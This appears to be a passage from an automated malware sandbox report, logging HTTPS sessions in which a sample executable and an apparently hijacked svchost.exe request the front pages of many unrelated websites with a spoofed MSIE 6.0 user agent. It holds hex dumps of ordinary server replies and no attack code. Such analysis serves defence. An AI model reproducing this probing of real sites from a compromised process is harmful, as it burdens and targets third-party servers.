2023-03-22 04:45:57 UTC	3202	IN	Data Raw: 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 66 65 61 74 75 72 65 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f Data Ascii: ass="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-feature"><div class="g-container"> <div class="g-grid"><div class="g-block size-100"><div class="spacer"></
2023-03-22 04:45:57 UTC	3204	IN	Data Raw: 6d 61 69 6c 26 23 31 36 30 3b 70 72 6f 74 65 63 74 65 64 5d 3c 2f 61 3e 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 43 6f 6e 73 75 6c 74 61 20 45 78 74 65 72 6e 61 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 33 2d 20 4f 70 63 69 c3 b3 6e 20 31 20 63 69 74 61 20 64 65 20 6f 6e 63 6f 6c 6f 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 32 20 70 72 6f 67 72 61 6d 61 63 69 c3 b3 6e 20 64 65 20 63 69 72 75 67 c3 ad 61 2d 20 4f 70 63 69 c3 b3 6e 20 33 20 6f 74 72 61 73 20 63 69 74 61 73 20 3c 62 72 3e 0a 48 6f 72 61 72 69 6f 20 64 65 20 61 74 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 Data Ascii: mail protected]</a></br><br></br><strong>Citas Consulta Externa: <p>6076430023- Opcin 1 cita de oncologa- Opcin 2 programacin de ciruga- Opcin 3 otras citas <br>Horario de atencin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</b
2023-03-22 04:45:57 UTC	3205	IN	Data Raw: 74 6c 65 22 3e 44 69 72 65 63 63 69 c3 b3 6e 3c 2f 68 33 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 20 67 2d 63 6f 6e 74 61 63 74 2d 63 6f 6d 70 61 63 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 43 61 6c 6c 65 20 34 38 20 23 20 32 35 2d 35 36 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 Data Ascii: tle">Direccin</h3><div class="g-contact g-contact-compact"><div class="g-contact-item"><div class="g-contact-label">Calle 48 # 25-56</div> <div class="g-contact-text">Calle 48 # 25-56</div> </div><div class="g-contact-item"><div class="g-contact-la
2023-03-22 04:45:57 UTC	3206	IN	Data Raw: 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 70 79 72 69 67 68 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 6c 6f 67 6f 2d 32 34 34 34 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 Data Ascii: ></div></div></section></div></div></div></section><section id="g-copyright"><div class="g-container"> <div class="g-grid"><div class="g-block size-33-3"><div id="logo-2444-particle" class="g-content g-particle"> <a href="/" title="" rel="home
2023-03-22 04:45:57 UTC	3208	IN	Data Raw: 35 30 32 0d 0a 2d 74 65 78 74 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 73 72 63 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 63 72 69 70 74 73 2f 35 63 35 64 64 37 32 38 2f 63 6c 6f 75 64 66 6c 61 72 65 2d 73 74 61 74 69 63 2f 65 6d 61 69 6c 2d 64 65 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 Data Ascii: 502-text"></span></a></div></div></div></div></div></section></div><script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script type="text/javascript" src="/media/gantry5/assets/js/main.js"
2023-03-22 04:45:57 UTC	3209	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.5	27450	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3044	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: diamir.de
2023-03-22 04:45:57 UTC	3172	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 22 Mar 2023 04:45:57 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.diamir.de/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:45:57 UTC	3172	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.5	27463	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3173	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.diamir.de
2023-03-22 04:45:57 UTC	3174	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Wed, 22 Mar 2023 04:45:57 GMT Content-Type: text/html Content-Length: 548 Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:45:57 UTC	3174	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.5	27429	49.212.235.175	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3173	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: nts-web.net

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.5	27460	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3173	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:45:57 UTC	3174	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:57 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:45:57 UTC	3175	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.5	27473	188.114.97.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3175	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.se
2023-03-22 04:45:57 UTC	3209	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:45:57 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Location: https://hyab.com Cache-Control: max-age=600 Expires: Wed, 22 Mar 2023 04:55:57 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2SOHRzMXJSGdqPuWOtauxedAUt3iB0P%2FhC7fhXxBjtdFBDomWbNsJrt5%2Bf2tziyrReSoS4VZRogL5GmmyfawGXxw7Xfb0TwOZeVZonrCjnuHeCQOISbu5nqs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc9c2889b35e2-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:57 UTC	3210	IN	Data Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
2023-03-22 04:45:57 UTC	3210	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.5	27479	188.114.96.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3176	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: sigtoa.com
2023-03-22 04:45:57 UTC	3210	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=B%2FfIcPY92J7Ih5E94xA50MP4kxOA%2FSDB75T%2FYKFqFIZSeXDOW6Pq18xgBlEhy9EwnZnhPlrETWWkJv8RZIHnscnn7EI5HXXq%2FNoyzHX%2FK5RlHW5FA%2BQyCEEHHSTT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc9c318f83648-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:57 UTC	3211	IN	Data Raw: 31 65 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d Data Ascii: 1e93<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-
2023-03-22 04:45:57 UTC	3211	IN	Data Raw: 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e Data Ascii: Compatible" content="IE=Edge"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js">
2023-03-22 04:45:57 UTC	3213	IN	Data Raw: 20 20 73 69 67 74 6f 61 2e 63 6f 6d 20 6e 65 65 64 73 20 74 6f 20 72 65 76 69 65 77 20 74 68 65 20 73 65 63 75 72 69 74 79 20 6f 66 20 79 6f 75 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 62 65 66 6f 72 65 20 70 72 6f 63 65 65 64 69 6e 67 2e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 63 68 61 6c 6c 65 6e 67 65 2d 66 6f 72 6d 22 20 61 63 74 69 6f 6e 3d 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 47 73 37 38 47 6e 55 45 72 66 66 55 72 46 51 78 78 6a 74 46 39 69 54 4d 61 57 65 4d 4b 6e 63 33 76 5a 33 4d 49 5a 72 6d 30 46 49 2d 31 36 37 39 34 36 30 33 35 37 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 Data Ascii: sigtoa.com needs to review the security of your connection before proceeding. </div> <form id="challenge-form" action="/?__cf_chl_f_tk=Gs78GnUErffUrFQxxjtF9iTMaWeMKnc3vZ3MIZrm0FI-1679460357-0-gaNycGzNCPs" method="POST" enctype="applicati
2023-03-22 04:45:57 UTC	3214	IN	Data Raw: 37 4e 55 49 6a 4d 66 4a 74 73 58 61 4a 49 45 42 2d 53 49 71 6b 71 73 79 49 73 2d 74 73 47 58 51 73 42 35 36 54 49 34 34 7a 74 58 6c 4a 7a 79 50 34 79 32 4a 34 45 48 5f 45 6a 62 6b 4c 65 68 53 35 5f 62 75 55 62 79 58 42 62 49 78 61 7a 37 49 7a 61 58 30 58 7a 79 37 6d 42 36 66 31 36 41 4e 6c 41 45 4a 33 34 53 64 44 79 47 71 64 68 30 6e 42 4e 65 51 53 51 35 63 39 59 33 42 55 33 4e 55 6f 57 6e 47 58 41 6c 63 5a 56 6f 70 33 6c 43 4c 49 75 74 70 56 53 31 36 33 2d 72 54 57 4d 69 6f 6f 58 56 4b 42 58 68 63 4c 4b 6a 2d 47 69 7a 49 79 33 79 77 45 46 46 65 30 38 34 69 76 4f 44 62 53 67 37 52 37 43 6d 73 38 51 75 50 50 67 6a 70 37 31 74 69 65 30 36 30 37 63 43 77 31 70 6e 6b 38 79 78 4d 5a 63 4a 47 6c 5f 79 56 67 69 38 71 57 61 61 63 6b 4e 33 75 54 4c 6a 32 7a 42 65 Data Ascii: 7NUIjMfJtsXaJIEB-SIqkqsyIs-tsGXQsB56TI44ztXlJzyP4y2J4EH_EjbkLehS5_buUbyXBbIxaz7IzaX0Xzy7mB6f16ANlAEJ34SdDyGqdh0nBNeQSQ5c9Y3BU3NUoWnGXAlcZVop3lCLIutpVS163-rTWMiooXVKBXhcLKj-GizIy3ywEFFe084ivODbSg7R7Cms8QuPPgjp71tie0607cCw1pnk8yxMZcJGl_yVgi8qWaackN3uTLj2zBe
2023-03-22 04:45:57 UTC	3215	IN	Data Raw: 64 3a 20 27 32 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 5a 6f 6e 65 3a 20 27 73 69 67 74 6f 61 2e 63 6f 6d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4e 6f 75 6e 63 65 3a 20 27 35 30 32 34 39 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 52 61 79 3a 20 27 37 61 62 62 63 39 63 33 31 38 66 38 33 36 34 38 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 65 66 31 62 32 35 34 62 64 39 31 63 35 37 34 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 47 73 37 38 47 6e 55 45 72 66 66 55 72 46 51 78 78 6a 74 46 39 69 54 4d 61 57 65 4d 4b 6e 63 33 76 5a 33 4d 49 5a 72 6d 30 Data Ascii: d: '2', cZone: 'sigtoa.com', cType: 'managed', cNounce: '50249', cRay: '7abbc9c318f83648', cHash: 'ef1b254bd91c574', cUPMDTk: "\/?__cf_chl_tk=Gs78GnUErffUrFQxxjtF9iTMaWeMKnc3vZ3MIZrm0
2023-03-22 04:45:57 UTC	3217	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 3a 20 27 6a 4e 37 70 39 75 74 77 4c 51 70 38 69 36 76 6e 43 6c 4c 6a 72 7a 57 37 44 62 36 53 74 72 74 4c 77 39 73 6a 33 58 48 75 4f 73 67 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 31 3a 20 27 39 78 58 41 32 46 74 58 42 51 33 31 6d 6c 2f 51 4d 59 34 50 2f 41 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 4d 7a 31 72 32 4e 37 42 70 68 63 4e 46 69 72 62 6c 6f 42 47 42 41 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 Data Ascii: m: 'jN7p9utwLQp8i6vnClLjrzW7Db6StrtLw9sj3XHuOsg=', i1: '9xXA2FtXBQ31ml/QMY4P/A==', i2: 'Mz1r2N7BphcNFirbloBGBA==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/i
2023-03-22 04:45:57 UTC	3218	IN	Data Raw: 3d 47 73 37 38 47 6e 55 45 72 66 66 55 72 46 51 78 78 6a 74 46 39 69 54 4d 61 57 65 4d 4b 6e 63 33 76 5a 33 4d 49 5a 72 6d 30 46 49 2d 31 36 37 39 34 36 30 33 35 37 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e Data Ascii: =Gs78GnUErffUrFQxxjtF9iTMaWeMKnc3vZ3MIZrm0FI-1679460357-0-gaNycGzNCPs" + window._cf_chl_opt.cOgUHash); cpo.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagN
2023-03-22 04:45:57 UTC	3219	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.5	27483	104.21.65.224	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:57 UTC	3219	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.com
